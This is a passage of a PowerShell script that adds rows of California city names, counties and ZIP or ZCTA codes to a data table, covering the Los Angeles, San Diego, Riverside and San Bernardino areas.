$Cities.Rows.Add("Arcadia","Los Angeles","California","CA","6","91007") + $null = $Cities.Rows.Add("Bradbury","Los Angeles","California","CA","6","91010") + $null = $Cities.Rows.Add("Flintridge","Los Angeles","California","CA","6","91011") + $null = $Cities.Rows.Add("Monrovia","Los Angeles","California","CA","6","91016") + $null = $Cities.Rows.Add("Montrose","Los Angeles","California","CA","6","91020") + $null = $Cities.Rows.Add("Sierra madre","Los Angeles","California","CA","6","91024") + $null = $Cities.Rows.Add("South pasadena","Los Angeles","California","CA","6","91030") + $null = $Cities.Rows.Add("Shadow hills","Los Angeles","California","CA","6","91040") + $null = $Cities.Rows.Add("Tujunga","Los Angeles","California","CA","6","91042") + $null = $Cities.Rows.Add("Zcta 910hh","Los Angeles","California","CA","6","910HH") + $null = $Cities.Rows.Add("Zcta 910xx","Los Angeles","California","CA","6","910XX") + $null = $Cities.Rows.Add("Pasadena","Los Angeles","California","CA","6","91101") + $null = $Cities.Rows.Add("Pasadena","Los Angeles","California","CA","6","91103") + $null = $Cities.Rows.Add("Pasadena","Los Angeles","California","CA","6","91104") + $null = $Cities.Rows.Add("Pasadena","Los Angeles","California","CA","6","91105") + $null = $Cities.Rows.Add("Pasadena","Los Angeles","California","CA","6","91106") + $null = $Cities.Rows.Add("Pasadena","Los Angeles","California","CA","6","91107") + $null = $Cities.Rows.Add("San marino","Los Angeles","California","CA","6","91108") + $null = $Cities.Rows.Add("Glendale","Los Angeles","California","CA","6","91201") + $null = $Cities.Rows.Add("Glendale","Los Angeles","California","CA","6","91202") + $null = $Cities.Rows.Add("Glendale","Los Angeles","California","CA","6","91203") + $null = $Cities.Rows.Add("Glendale","Los Angeles","California","CA","6","91204") + $null = $Cities.Rows.Add("Glendale","Los Angeles","California","CA","6","91205") + $null = $Cities.Rows.Add("Glendale","Los Angeles","California","CA","6","91206") + $null = $Cities.Rows.Add("Glendale","Los Angeles","California","CA","6","91207") + $null = $Cities.Rows.Add("Glendale","Los Angeles","California","CA","6","91208") + $null = $Cities.Rows.Add("La crescenta","Los Angeles","California","CA","6","91214") + $null = $Cities.Rows.Add("Oak park","Los Angeles","California","CA","6","91301") + $null = $Cities.Rows.Add("Calabasas","Los Angeles","California","CA","6","91302") + $null = $Cities.Rows.Add("Canoga park","Los Angeles","California","CA","6","91303") + $null = $Cities.Rows.Add("Canoga park","Los Angeles","California","CA","6","91304") + $null = $Cities.Rows.Add("Winnetka","Los Angeles","California","CA","6","91306") + $null = $Cities.Rows.Add("West hills","Los Angeles","California","CA","6","91307") + $null = $Cities.Rows.Add("Chatsworth","Los Angeles","California","CA","6","91311") + $null = $Cities.Rows.Add("Encino","Los Angeles","California","CA","6","91316") + $null = $Cities.Rows.Add("Newbury park","Ventura","California","CA","6","91320") + $null = $Cities.Rows.Add("Newhall","Los Angeles","California","CA","6","91321") + $null = $Cities.Rows.Add("Northridge","Los Angeles","California","CA","6","91324") + $null = $Cities.Rows.Add("Northridge","Los Angeles","California","CA","6","91325") + $null = $Cities.Rows.Add("Porter ranch","Los Angeles","California","CA","6","91326") + $null = $Cities.Rows.Add("Arleta","Los Angeles","California","CA","6","91331") + $null = $Cities.Rows.Add("Reseda","Los Angeles","California","CA","6","91335") + $null = $Cities.Rows.Add("San fernando","Los Angeles","California","CA","6","91340") + $null = $Cities.Rows.Add("Sylmar","Los Angeles","California","CA","6","91342") + $null = $Cities.Rows.Add("North hills","Los Angeles","California","CA","6","91343") + $null = $Cities.Rows.Add("Granada hills","Los Angeles","California","CA","6","91344") + $null = $Cities.Rows.Add("Mission hills","Los Angeles","California","CA","6","91345") + $null = $Cities.Rows.Add("Agua dulce","Los Angeles","California","CA","6","91350") + $null = $Cities.Rows.Add("Canyon country","Los Angeles","California","CA","6","91351") + $null = $Cities.Rows.Add("Sun valley","Los Angeles","California","CA","6","91352") + $null = $Cities.Rows.Add("Valencia","Los Angeles","California","CA","6","91354") + $null = $Cities.Rows.Add("Valencia","Los Angeles","California","CA","6","91355") + $null = $Cities.Rows.Add("Tarzana","Los Angeles","California","CA","6","91356") + $null = $Cities.Rows.Add("Thousand oaks","Ventura","California","CA","6","91360") + $null = $Cities.Rows.Add("Westlake village","Ventura","California","CA","6","91361") + $null = $Cities.Rows.Add("Westlake village","Ventura","California","CA","6","91362") + $null = $Cities.Rows.Add("Woodland hills","Los Angeles","California","CA","6","91364") + $null = $Cities.Rows.Add("Woodland hills","Los Angeles","California","CA","6","91367") + $null = $Cities.Rows.Add("Zcta 91377","Ventura","California","CA","6","91377") + $null = $Cities.Rows.Add("Newhall","Los Angeles","California","CA","6","91381") + $null = $Cities.Rows.Add("Castaic","Los Angeles","California","CA","6","91384") + $null = $Cities.Rows.Add("Zcta 913hh","Los Angeles","California","CA","6","913HH") + $null = $Cities.Rows.Add("Zcta 913xx","Los Angeles","California","CA","6","913XX") + $null = $Cities.Rows.Add("Van nuys","Los Angeles","California","CA","6","91401") + $null = $Cities.Rows.Add("Panorama city","Los Angeles","California","CA","6","91402") + $null = $Cities.Rows.Add("Sherman oaks","Los Angeles","California","CA","6","91403") + $null = $Cities.Rows.Add("Van nuys","Los Angeles","California","CA","6","91405") + $null = $Cities.Rows.Add("Van nuys","Los Angeles","California","CA","6","91406") + $null = $Cities.Rows.Add("Van nuys","Los Angeles","California","CA","6","91411") + $null = $Cities.Rows.Add("Sherman oaks","Los Angeles","California","CA","6","91423") + $null = $Cities.Rows.Add("Encino","Los Angeles","California","CA","6","91436") + $null = $Cities.Rows.Add("Burbank","Los Angeles","California","CA","6","91501") + $null = $Cities.Rows.Add("Burbank","Los Angeles","California","CA","6","91502") + $null = $Cities.Rows.Add("Burbank","Los Angeles","California","CA","6","91504") + $null = $Cities.Rows.Add("Burbank","Los Angeles","California","CA","6","91505") + $null = $Cities.Rows.Add("Burbank","Los Angeles","California","CA","6","91506") + $null = $Cities.Rows.Add("North hollywood","Los Angeles","California","CA","6","91601") + $null = $Cities.Rows.Add("Toluca lake","Los Angeles","California","CA","6","91602") + $null = $Cities.Rows.Add("Studio city","Los Angeles","California","CA","6","91604") + $null = $Cities.Rows.Add("North hollywood","Los Angeles","California","CA","6","91605") + $null = $Cities.Rows.Add("North hollywood","Los Angeles","California","CA","6","91606") + $null = $Cities.Rows.Add("Valley village","Los Angeles","California","CA","6","91607") + $null = $Cities.Rows.Add("Universal city","Los Angeles","California","CA","6","91608") + $null = $Cities.Rows.Add("Alta loma","San Bernardino","California","CA","6","91701") + $null = $Cities.Rows.Add("Azusa","Los Angeles","California","CA","6","91702") + $null = $Cities.Rows.Add("Irwindale","Los Angeles","California","CA","6","91706") + $null = $Cities.Rows.Add("Chino hills","San Bernardino","California","CA","6","91709") + $null = $Cities.Rows.Add("Chino","San Bernardino","California","CA","6","91710") + $null = $Cities.Rows.Add("Claremont","Los Angeles","California","CA","6","91711") + $null = $Cities.Rows.Add("Corona","Riverside","California","CA","6","91719") + $null = $Cities.Rows.Add("Covina","Los Angeles","California","CA","6","91722") + $null = $Cities.Rows.Add("Covina","Los Angeles","California","CA","6","91723") + $null = $Cities.Rows.Add("Covina","Los Angeles","California","CA","6","91724") + $null = $Cities.Rows.Add("Rancho cucamonga","San Bernardino","California","CA","6","91730") + $null = $Cities.Rows.Add("El monte","Los Angeles","California","CA","6","91731") + $null = $Cities.Rows.Add("El monte","Los Angeles","California","CA","6","91732") + $null = $Cities.Rows.Add("South el monte","Los Angeles","California","CA","6","91733") + $null = $Cities.Rows.Add("Alta loma","San Bernardino","California","CA","6","91737") + $null = $Cities.Rows.Add("Etiwanda","San Bernardino","California","CA","6","91739") + $null = $Cities.Rows.Add("Glendora","Los Angeles","California","CA","6","91740") + $null = $Cities.Rows.Add("Glendora","Los Angeles","California","CA","6","91741") + $null = $Cities.Rows.Add("Guasti","San Bernardino","California","CA","6","91743") + $null = $Cities.Rows.Add("Industry","Los Angeles","California","CA","6","91744") + $null = $Cities.Rows.Add("Hacienda heights","Los Angeles","California","CA","6","91745") + $null = $Cities.Rows.Add("Bassett","Los Angeles","California","CA","6","91746") + $null = $Cities.Rows.Add("Rowland heights","Los Angeles","California","CA","6","91748") + $null = $Cities.Rows.Add("La verne","Los Angeles","California","CA","6","91750") + $null = $Cities.Rows.Add("Mira loma","Riverside","California","CA","6","91752") + $null = $Cities.Rows.Add("Monterey park","Los Angeles","California","CA","6","91754") + $null = $Cities.Rows.Add("Monterey park","Los Angeles","California","CA","6","91755") + $null = $Cities.Rows.Add("Mt baldy","Los Angeles","California","CA","6","91759") + $null = $Cities.Rows.Add("Ontario","San Bernardino","California","CA","6","91761") + $null = $Cities.Rows.Add("Ontario","San Bernardino","California","CA","6","91762") + $null = $Cities.Rows.Add("Montclair","San Bernardino","California","CA","6","91763") + $null = $Cities.Rows.Add("Ontario","San Bernardino","California","CA","6","91764") + $null = $Cities.Rows.Add("Diamond bar","Los Angeles","California","CA","6","91765") + $null = $Cities.Rows.Add("Phillips ranch","Los Angeles","California","CA","6","91766") + $null = $Cities.Rows.Add("Pomona","Los Angeles","California","CA","6","91767") + $null = $Cities.Rows.Add("Pomona","Los Angeles","California","CA","6","91768") + $null = $Cities.Rows.Add("Rosemead","Los Angeles","California","CA","6","91770") + $null = $Cities.Rows.Add("San dimas","Los Angeles","California","CA","6","91773") + $null = $Cities.Rows.Add("San gabriel","Los Angeles","California","CA","6","91775") + $null = $Cities.Rows.Add("San gabriel","Los Angeles","California","CA","6","91776") + $null = $Cities.Rows.Add("Temple city","Los Angeles","California","CA","6","91780") + $null = $Cities.Rows.Add("Upland","San Bernardino","California","CA","6","91784") + $null = $Cities.Rows.Add("Upland","San Bernardino","California","CA","6","91786") + $null = $Cities.Rows.Add("Diamond bar","Los Angeles","California","CA","6","91789") + $null = $Cities.Rows.Add("West covina","Los Angeles","California","CA","6","91790") + $null = $Cities.Rows.Add("West covina","Los Angeles","California","CA","6","91791") + $null = $Cities.Rows.Add("West covina","Los Angeles","California","CA","6","91792") + $null = $Cities.Rows.Add("Zcta 917hh","Los Angeles","California","CA","6","917HH") + $null = $Cities.Rows.Add("Zcta 917xx","Los Angeles","California","CA","6","917XX") + $null = $Cities.Rows.Add("Alhambra","Los Angeles","California","CA","6","91801") + $null = $Cities.Rows.Add("Alhambra","Los Angeles","California","CA","6","91803") + $null = $Cities.Rows.Add("Alpine","San Diego","California","CA","6","91901") + $null = $Cities.Rows.Add("Bonita","San Diego","California","CA","6","91902") + $null = $Cities.Rows.Add("Boulevard","San Diego","California","CA","6","91905") + $null = $Cities.Rows.Add("Campo","San Diego","California","CA","6","91906") + $null = $Cities.Rows.Add("Chula vista","San Diego","California","CA","6","91910") + $null = $Cities.Rows.Add("Chula vista","San Diego","California","CA","6","91911") + $null = $Cities.Rows.Add("Chula vista","San Diego","California","CA","6","91913") + $null = $Cities.Rows.Add("Chula vista","San Diego","California","CA","6","91914") + $null = $Cities.Rows.Add("Chula vista","San Diego","California","CA","6","91915") + $null = $Cities.Rows.Add("Descanso","San Diego","California","CA","6","91916") + $null = $Cities.Rows.Add("Dulzura","San Diego","California","CA","6","91917") + $null = $Cities.Rows.Add("Guatay","San Diego","California","CA","6","91931") + $null = $Cities.Rows.Add("Imperial beach","San Diego","California","CA","6","91932") + $null = $Cities.Rows.Add("Jacumba","San Diego","California","CA","6","91934") + $null = $Cities.Rows.Add("Jamul","San Diego","California","CA","6","91935") + $null = $Cities.Rows.Add("La mesa","San Diego","California","CA","6","91941") + $null = $Cities.Rows.Add("La mesa","San Diego","California","CA","6","91942") + $null = $Cities.Rows.Add("Lemon grove","San Diego","California","CA","6","91945") + $null = $Cities.Rows.Add("Mount laguna","San Diego","California","CA","6","91948") + $null = $Cities.Rows.Add("National city","San Diego","California","CA","6","91950") + $null = $Cities.Rows.Add("Pine valley","San Diego","California","CA","6","91962") + $null = $Cities.Rows.Add("Potrero","San Diego","California","CA","6","91963") + $null = $Cities.Rows.Add("Spring valley","San Diego","California","CA","6","91977") + $null = $Cities.Rows.Add("Spring valley","San Diego","California","CA","6","91978") + $null = $Cities.Rows.Add("Tecate","San Diego","California","CA","6","91980") + $null = $Cities.Rows.Add("Zcta 919hh","San Diego","California","CA","6","919HH") + $null = $Cities.Rows.Add("Zcta 919xx","San Diego","California","CA","6","919XX") + $null = $Cities.Rows.Add("Bonsall","San Diego","California","CA","6","92003") + $null = $Cities.Rows.Add("Borrego springs","San Diego","California","CA","6","92004") + $null = $Cities.Rows.Add("Cardiff by the s","San Diego","California","CA","6","92007") + $null = $Cities.Rows.Add("Carlsbad","San Diego","California","CA","6","92008") + $null = $Cities.Rows.Add("Carlsbad","San Diego","California","CA","6","92009") + $null = $Cities.Rows.Add("Del mar","San Diego","California","CA","6","92014") + $null = $Cities.Rows.Add("El cajon","San Diego","California","CA","6","92019") + $null = $Cities.Rows.Add("El cajon","San Diego","California","CA","6","92020") + $null = $Cities.Rows.Add("El cajon","San Diego","California","CA","6","92021") + $null = $Cities.Rows.Add("Encinitas","San Diego","California","CA","6","92024") + $null = $Cities.Rows.Add("Escondido","San Diego","California","CA","6","92025") + $null = $Cities.Rows.Add("Escondido","San Diego","California","CA","6","92026") + $null = $Cities.Rows.Add("Escondido","San Diego","California","CA","6","92027") + $null = $Cities.Rows.Add("Fallbrook","San Diego","California","CA","6","92028") + $null = $Cities.Rows.Add("Escondido","San Diego","California","CA","6","92029") + $null = $Cities.Rows.Add("Julian","San Diego","California","CA","6","92036") + $null = $Cities.Rows.Add("La jolla","San Diego","California","CA","6","92037") + $null = $Cities.Rows.Add("Lakeside","San Diego","California","CA","6","92040") + $null = $Cities.Rows.Add("Oceanside","San Diego","California","CA","6","92054") + $null = $Cities.Rows.Add("Oceanside","San Diego","California","CA","6","92056") + $null = $Cities.Rows.Add("Oceanside","San Diego","California","CA","6","92057") + $null = $Cities.Rows.Add("Pala","San Diego","California","CA","6","92059") + $null = $Cities.Rows.Add("Palomar mountain","San Diego","California","CA","6","92060") + $null = $Cities.Rows.Add("Pauma valley","San Diego","California","CA","6","92061") + $null = $Cities.Rows.Add("Poway","San Diego","California","CA","6","92064") + $null = $Cities.Rows.Add("Ramona","San Diego","California","CA","6","92065") + $null = $Cities.Rows.Add("Ranchita","San Diego","California","CA","6","92066") + $null = $Cities.Rows.Add("Rancho santa fe","San Diego","California","CA","6","92067") + $null = $Cities.Rows.Add("San marcos","San Diego","California","CA","6","92069") + $null = $Cities.Rows.Add("Santa ysabel","San Diego","California","CA","6","92070") + $null = $Cities.Rows.Add("Santee","San Diego","California","CA","6","92071") + $null = $Cities.Rows.Add("Solana beach","San Diego","California","CA","6","92075") + $null = $Cities.Rows.Add("Zcta 92078","San Diego","California","CA","6","92078") + $null = $Cities.Rows.Add("Valley center","San Diego","California","CA","6","92082") + $null = $Cities.Rows.Add("Vista","San Diego","California","CA","6","92083") + $null = $Cities.Rows.Add("Vista","San Diego","California","CA","6","92084") + $null = $Cities.Rows.Add("Warner springs","San Diego","California","CA","6","92086") + $null = $Cities.Rows.Add("Zcta 92091","San Diego","California","CA","6","92091") + $null = $Cities.Rows.Add("Zcta 920hh","San Diego","California","CA","6","920HH") + $null = $Cities.Rows.Add("Zcta 920xx","San Diego","California","CA","6","920XX") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92101") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92102") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92103") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92104") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92105") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92106") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92107") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92108") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92109") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92110") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92111") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92113") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92114") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92115") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92116") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92117") + $null = $Cities.Rows.Add("Coronado","San Diego","California","CA","6","92118") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92119") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92120") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92121") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92122") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92123") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92124") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92126") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92127") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92128") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92129") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92130") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92131") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92139") + $null = $Cities.Rows.Add("San diego","San Diego","California","CA","6","92154") + $null = $Cities.Rows.Add("San ysidro","San Diego","California","CA","6","92173") + $null = $Cities.Rows.Add("Zcta 921hh","San Diego","California","CA","6","921HH") + $null = $Cities.Rows.Add("Chiriaco summit","Riverside","California","CA","6","92201") + $null = $Cities.Rows.Add("Indio","Riverside","California","CA","6","92203") + $null = $Cities.Rows.Add("Indian wells","Riverside","California","CA","6","92210") + $null = $Cities.Rows.Add("Palm desert","Riverside","California","CA","6","92211") + $null = $Cities.Rows.Add("Banning","Riverside","California","CA","6","92220") + $null = $Cities.Rows.Add("Beaumont","Riverside","California","CA","6","92223") + $null = $Cities.Rows.Add("Lost lake","Riverside","California","CA","6","92225") + $null = $Cities.Rows.Add("Brawley","Imperial","California","CA","6","92227") + $null = $Cities.Rows.Add("Cabazon","Riverside","California","CA","6","92230") + $null = $Cities.Rows.Add("Calexico","Imperial","California","CA","6","92231") + $null = $Cities.Rows.Add("Calipatria","Imperial","California","CA","6","92233") + $null = $Cities.Rows.Add("Cathedral city","Riverside","California","CA","6","92234") + $null = $Cities.Rows.Add("Coachella","Riverside","California","CA","6","92236") + $null = $Cities.Rows.Add("Eagle mountain","Riverside","California","CA","6","92239") + $null = $Cities.Rows.Add("Desert hot sprin","Riverside","California","CA","6","92240") + $null = $Cities.Rows.Add("Desert hot sprin","Riverside","California","CA","6","92241") + $null = $Cities.Rows.Add("Big river","San Bernardino","California","CA","6","92242") + $null = $Cities.Rows.Add("El centro","Imperial","California","CA","6","92243") + $null = $Cities.Rows.Add("Heber","Imperial","California","CA","6","92249") + $null = $Cities.Rows.Add("Holtville","Imperial","California","CA","6","92250") + $null = $Cities.Rows.Add("Imperial","Imperial","California","CA","6","92251") + $null = $Cities.Rows.Add("Joshua tree","San Bernardino","California","CA","6","92252") + $null = $Cities.Rows.Add("La quinta","Riverside","California","CA","6","92253") + $null = $Cities.Rows.Add("Mecca","Riverside","California","CA","6","92254") + $null = $Cities.Rows.Add("Morongo valley","San Bernardino","California","CA","6","92256") + $null = $Cities.Rows.Add("Niland","Imperial","California","CA","6","92257") + $null = $Cities.Rows.Add("North palm sprin","Riverside","California","CA","6","92258") + $null = $Cities.Rows.Add("Ocotillo","Imperial","California","CA","6","92259") + $null = $Cities.Rows.Add("Palm city","Riverside","California","CA","6","92260") + $null = $Cities.Rows.Add("Palm springs","Riverside","California","CA","6","92262") + $null = $Cities.Rows.Add("Palm springs","Riverside","California","CA","6","92264") + $null = $Cities.Rows.Add("Palo verde","Imperial","California","CA","6","92266") + $null = $Cities.Rows.Add("Parker dam","San Bernardino","California","CA","6","92267") + $null = $Cities.Rows.Add("Pioneertown","San Bernardino","California","CA","6","92268") + $null = $Cities.Rows.Add("Rancho mirage","Riverside","California","CA","6","92270") + $null = $Cities.Rows.Add("Seeley","Imperial","California","CA","6","92273") + $null = $Cities.Rows.Add("Salton city","Riverside","California","CA","6","92274") + $null = $Cities.Rows.Add("Salton city","Imperial","California","CA","6","92275") + $null = $Cities.Rows.Add("Thousand palms","Riverside","California","CA","6","92276") + $null = $Cities.Rows.Add("Twentynine palms","San Bernardino","California","CA","6","92277") + $null = $Cities.Rows.Add("Twentynine palms","San Bernardino","California","CA","6","92278") + $null = $Cities.Rows.Add("Vidal","San Bernardino","California","CA","6","92280") + $null = $Cities.Rows.Add("Westmorland","Imperial","California","CA","6","92281") + $null = $Cities.Rows.Add("White water","Riverside","California","CA","6","92282") + $null = $Cities.Rows.Add("Felicity","Imperial","California","CA","6","92283") + $null = $Cities.Rows.Add("Yucca valley","San Bernardino","California","CA","6","92284") + $null = $Cities.Rows.Add("Landers","San Bernardino","California","CA","6","92285") + $null = $Cities.Rows.Add("Zcta 922hh","Imperial","California","CA","6","922HH") + $null = $Cities.Rows.Add("Zcta 922xx","Riverside","California","CA","6","922XX") + $null = $Cities.Rows.Add("Adelanto","San Bernardino","California","CA","6","92301") + $null = $Cities.Rows.Add("Amboy","San Bernardino","California","CA","6","92304") + $null = $Cities.Rows.Add("Angelus oaks","San Bernardino","California","CA","6","92305") + $null = $Cities.Rows.Add("Apple valley","San Bernardino","California","CA","6","92307") + $null = $Cities.Rows.Add("Apple valley","San Bernardino","California","CA","6","92308") + $null = $Cities.Rows.Add("Baker","San Bernardino","California","CA","6","92309") + $null = $Cities.Rows.Add("Fort irwin","San Bernardino","California","CA","6","92310") + $null = $Cities.Rows.Add("Barstow","San Bernardino","California","CA","6","92311") + $null = $Cities.Rows.Add("Zcta 92313","San Bernardino","California","CA","6","92313") + $null = $Cities.Rows.Add("Big bear city","San Bernardino","California","CA","6","92314") + $null = $Cities.Rows.Add("Big bear lake","San Bernardino","California","CA","6","92315") + $null = $Cities.Rows.Add("Bloomington","San Bernardino","California","CA","6","92316") + $null = $Cities.Rows.Add("Blue jay","San Bernardino","California","CA","6","92317") + $null = $Cities.Rows.Add("Bryn mawr","San Bernardino","California","CA","6","92318") + $null = $Cities.Rows.Add("Calimesa","Riverside","California","CA","6","92320") + $null = $Cities.Rows.Add("Cedar glen","San Bernardino","California","CA","6","92321") + $null = $Cities.Rows.Add("Cima","San Bernardino","California","CA","6","92323") + $null = $Cities.Rows.Add("Grand terrace","San Bernardino","California","CA","6","92324") + $null = $Cities.Rows.Add("Crestline","San Bernardino","California","CA","6","92325") + $null = $Cities.Rows.Add("Daggett","San Bernardino","California","CA","6","92327") + $null = $Cities.Rows.Add("Death valley","Inyo","California","CA","6","92328") + $null = $Cities.Rows.Add("Essex","San Bernardino","California","CA","6","92332") + $null = $Cities.Rows.Add("Fawnskin","San Bernardino","California","CA","6","92333") + $null = $Cities.Rows.Add("Fontana","San Bernardino","California","CA","6","92335") + $null = $Cities.Rows.Add("Fontana","San Bernardino","California","CA","6","92336") + $null = $Cities.Rows.Add("Fontana","San Bernardino","California","CA","6","92337") + $null = $Cities.Rows.Add("Ludlow","San Bernardino","California","CA","6","92338") + $null = $Cities.Rows.Add("Forest falls","San Bernardino","California","CA","6","92339") + $null = $Cities.Rows.Add("Green valley lak","San Bernardino","California","CA","6","92341") + $null = $Cities.Rows.Add("Helendale","San Bernardino","California","CA","6","92342") + $null = $Cities.Rows.Add("Hesperia","San Bernardino","California","CA","6","92345") + $null = $Cities.Rows.Add("East highland","San Bernardino","California","CA","6","92346") + $null = $Cities.Rows.Add("Hinkley","San Bernardino","California","CA","6","92347") + $null = $Cities.Rows.Add("Lake arrowhead","San Bernardino","California","CA","6","92352") + $null = $Cities.Rows.Add("Loma linda","San Bernardino","California","CA","6","92354") + $null = $Cities.Rows.Add("Lucerne valley","San Bernardino","California","CA","6","92356") + $null = $Cities.Rows.Add("Lytle creek","San Bernardino","California","CA","6","92358") + $null = $Cities.Rows.Add("Mentone","San Bernardino","California","CA","6","92359") + $null = $Cities.Rows.Add("Needles","San Bernardino","California","CA","6","92363") + $null = $Cities.Rows.Add("Nipton","San Bernardino","California","CA","6","92364") + $null = $Cities.Rows.Add("Newberry springs","San Bernardino","California","CA","6","92365") + $null = $Cities.Rows.Add("Oro grande","San Bernardino","California","CA","6","92368") + $null = $Cities.Rows.Add("Phelan","San Bernardino","California","CA","6","92371") + $null = $Cities.Rows.Add("Pinon hills","San Bernardino","California","CA","6","92372") + $null = $Cities.Rows.Add("Redlands","San Bernardino","California","CA","6","92373") + $null = $Cities.Rows.Add("Redlands","San Bernardino","California","CA","6","92374") + $null = $Cities.Rows.Add("Rialto","San Bernardino","California","CA","6","92376") + $null = $Cities.Rows.Add("Rialto","San Bernardino","California","CA","6","92377") + $null = $Cities.Rows.Add("Arrowbear lake","San Bernardino","California","CA","6","92382") + $null = $Cities.Rows.Add("Shoshone","Inyo","California","CA","6","92384") + $null = $Cities.Rows.Add("Sugarloaf","San Bernardino","California","CA","6","92386") + $null = $Cities.Rows.Add("Tecopa","Inyo","California","CA","6","92389") + $null = $Cities.Rows.Add("Spring valley la","San Bernardino","California","CA","6","92392") + $null = $Cities.Rows.Add("George afb","San Bernardino","California","CA","6","92394") + $null = $Cities.Rows.Add("Wrightwood","San Bernardino","California","CA","6","92397") + $null = $Cities.Rows.Add("Yermo","San Bernardino","California","CA","6","92398") + $null = $Cities.Rows.Add("Yucaipa","San Bernardino","California","CA","6","92399") + $null = $Cities.Rows.Add("Zcta 923hh","San Bernardino","California","CA","6","923HH") + $null = $Cities.Rows.Add("Zcta 923xx","Inyo","California","CA","6","923XX") + $null = $Cities.Rows.Add("San bernardino","San Bernardino","California","CA","6","92401") + $null = $Cities.Rows.Add("San bernardino","San Bernardino","California","CA","6","92404") + $null = $Cities.Rows.Add("Muscoy","San Bernardino","California","CA","6","92405") + $null = $Cities.Rows.Add("San bernardino","San Bernardino","California","CA","6","92407") + $null = $Cities.Rows.Add("San bernardino","San Bernardino","California","CA","6","92408") + $null = $Cities.Rows.Add("San bernardino","San Bernardino","California","CA","6","92410") + $null = $Cities.Rows.Add("San bernardino","San Bernardino","California","CA","6","92411") + $null = $Cities.Rows.Add("Riverside","Riverside","California","CA","6","92501") + $null = $Cities.Rows.Add("Riverside","Riverside","California","CA","6","92503") + $null = $Cities.Rows.Add("Riverside","Riverside","California","CA","6","92504") + $null = $Cities.Rows.Add("Riverside","Riverside","California","CA","6","92505") + $null = $Cities.Rows.Add("Riverside","Riverside","California","CA","6","92506") + $null = $Cities.Rows.Add("Riverside","Riverside","California","CA","6","92507") + $null = $Cities.Rows.Add("Riverside","Riverside","California","CA","6","92508") + $null = $Cities.Rows.Add("Rubidoux","Riverside","California","CA","6","92509") + $null = $Cities.Rows.Add("March air force","Riverside","California","CA","6","92518") + $null = $Cities.Rows.Add("Lake elsinore","Riverside","California","CA","6","92530") + $null = $Cities.Rows.Add("Lake elsinore","Riverside","California","CA","6","92532") + $null = $Cities.Rows.Add("Aguanga","Riverside","California","CA","6","92536") + $null = $Cities.Rows.Add("Anza","Riverside","California","CA","6","92539") + $null = $Cities.Rows.Add("Hemet","Riverside","California","CA","6","92543") + $null = $Cities.Rows.Add("Hemet","Riverside","California","CA","6","92544") + $null = $Cities.Rows.Add("Hemet","Riverside","California","CA","6","92545") + $null = $Cities.Rows.Add("Homeland","Riverside","California","CA","6","92548") + $null = $Cities.Rows.Add("Idyllwild","Riverside","California","CA","6","92549") + $null = $Cities.Rows.Add("Zcta 92551","Riverside","California","CA","6","92551") + $null = $Cities.Rows.Add("Moreno valley","Riverside","California","CA","6","92553") + $null = $Cities.Rows.Add("Moreno valley","Riverside","California","CA","6","92555") + $null = $Cities.Rows.Add("Moreno valley","Riverside","California","CA","6","92557") + $null = $Cities.Rows.Add("Mountain center","Riverside","California","CA","6","92561") + $null = $Cities.Rows.Add("Murrieta","Riverside","California","CA","6","92562") + $null = $Cities.Rows.Add("Murrieta","Riverside","California","CA","6","92563") + $null = $Cities.Rows.Add("Lakeview","Riverside","California","CA","6","92567") + $null = $Cities.Rows.Add("Mead valley","Riverside","California","CA","6","92570") + $null = $Cities.Rows.Add("Perris","Riverside","California","CA","6","92571") + $null = $Cities.Rows.Add("San jacinto","Riverside","California","CA","6","92582") + $null = $Cities.Rows.Add("Gilman hot sprin","Riverside","California","CA","6","92583") + $null = $Cities.Rows.Add("Menifee","Riverside","California","CA","6","92584") + $null = $Cities.Rows.Add("Romoland","Riverside","California","CA","6","92585") + $null = $Cities.Rows.Add("Sun city","Riverside","California","CA","6","92586") + $null = $Cities.Rows.Add("Canyon lake","Riverside","California","CA","6","92587") + $null = $Cities.Rows.Add("Temecula","Riverside","California","CA","6","92590") + $null = $Cities.Rows.Add("Temecula","Riverside","California","CA","6","92591") + $null = $Cities.Rows.Add("Temecula","Riverside","California","CA","6","92592") + $null = $Cities.Rows.Add("Wildomar","Riverside","California","CA","6","92595") + $null = $Cities.Rows.Add("Winchester","Riverside","California","CA","6","92596") + $null = $Cities.Rows.Add("Zcta 925hh","Riverside","California","CA","6","925HH") + $null = $Cities.Rows.Add("Zcta 925xx","Riverside","California","CA","6","925XX") + $null = $Cities.Rows.Add("Zcta 92602","Orange","California","CA","6","92602") + $null = $Cities.Rows.Add("Zcta 92604","Orange","California","CA","6","92604") + $null = $Cities.Rows.Add("Zcta 92606","Orange","California","CA","6","92606") + $null = $Cities.Rows.Add("Foothill ranch","Orange","California","CA","6","92610") + $null = $Cities.Rows.Add("Zcta 92612","Orange","California","CA","6","92612") + $null = $Cities.Rows.Add("Zcta 92614","Orange","California","CA","6","92614") + $null = $Cities.Rows.Add("Zcta 